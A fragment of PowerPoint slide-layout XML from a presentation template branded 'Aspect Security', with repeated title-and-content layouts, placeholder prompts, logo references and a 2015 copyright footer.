            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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26_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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27_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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28_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
